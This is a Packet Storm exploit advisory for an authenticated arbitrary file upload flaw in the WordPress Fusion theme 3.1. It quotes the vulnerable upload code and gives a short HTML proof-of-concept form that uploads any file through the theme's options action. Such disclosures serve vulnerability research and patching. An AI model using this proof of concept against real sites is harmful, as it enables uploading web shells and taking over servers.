what you don't know can hurt you

WordPress Fusion 3.1 Arbitrary File Upload

WordPress Fusion 3.1 Arbitrary File Upload
Posted Feb 13, 2015
Authored by Evex

WordPress Fusion theme version 3.1 suffers from a remote file upload vulnerability.

tags | exploit, remote, file upload
MD5 | a102bea6c53a81b928c710f5399b08b8

WordPress Fusion 3.1 Arbitrary File Upload

Change Mirror Download
------------------------------------------------------------------------------
WordPress Fusion Theme Authenicated Arbitrary File Upload
------------------------------------------------------------------------------


[-] Theme Link:

https://wordpress.org/themes/fusion ( Over 334,000 Downloads )
http://digitalnature.ro/themes/fusion/

[-] Affected Version:

Version 3.1


[-] Vulnerability Description:

The vulnerable code is located in the /functions script:
//SHORTENED CODE

function fusion_options() {

if ( 'fusion_save' == $_REQUEST['action'] ) {
if ($_FILES["file-logo"]["type"]){
$directory = $uploadpath['basedir'].'/';
move_uploaded_file($_FILES["file-logo"]["tmp_name"],
$directory . $_FILES["file-logo"]["name"]);
update_option('fusion_logoimage', $uploadpath['baseurl']. "/".
$_FILES["file-logo"]["name"]);
}

}
add_action('admin_menu', 'fusion_options');


then function fusion_options can be called by LOGGED IN USERS and executed
which leads to uploading any file on attacked server which may cause the
site full take over.


[-] Proof of Concept:

<form action="http://localhost/x/wordpress/wp-admin/admin.php"
method="post" enctype="multipart/form-data">
<input type="file" name="file-logo" />
<input type="hidden" name="action" value="fusion_save" />
<button type="submit" >Upload</button>
</form>
Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    34 Files
  • 16
    Jun 16th
    9 Files
  • 17
    Jun 17th
    33 Files
  • 18
    Jun 18th
    11 Files
  • 19
    Jun 19th
    1 Files
  • 20
    Jun 20th
    3 Files
  • 21
    Jun 21st
    2 Files
  • 22
    Jun 22nd
    21 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close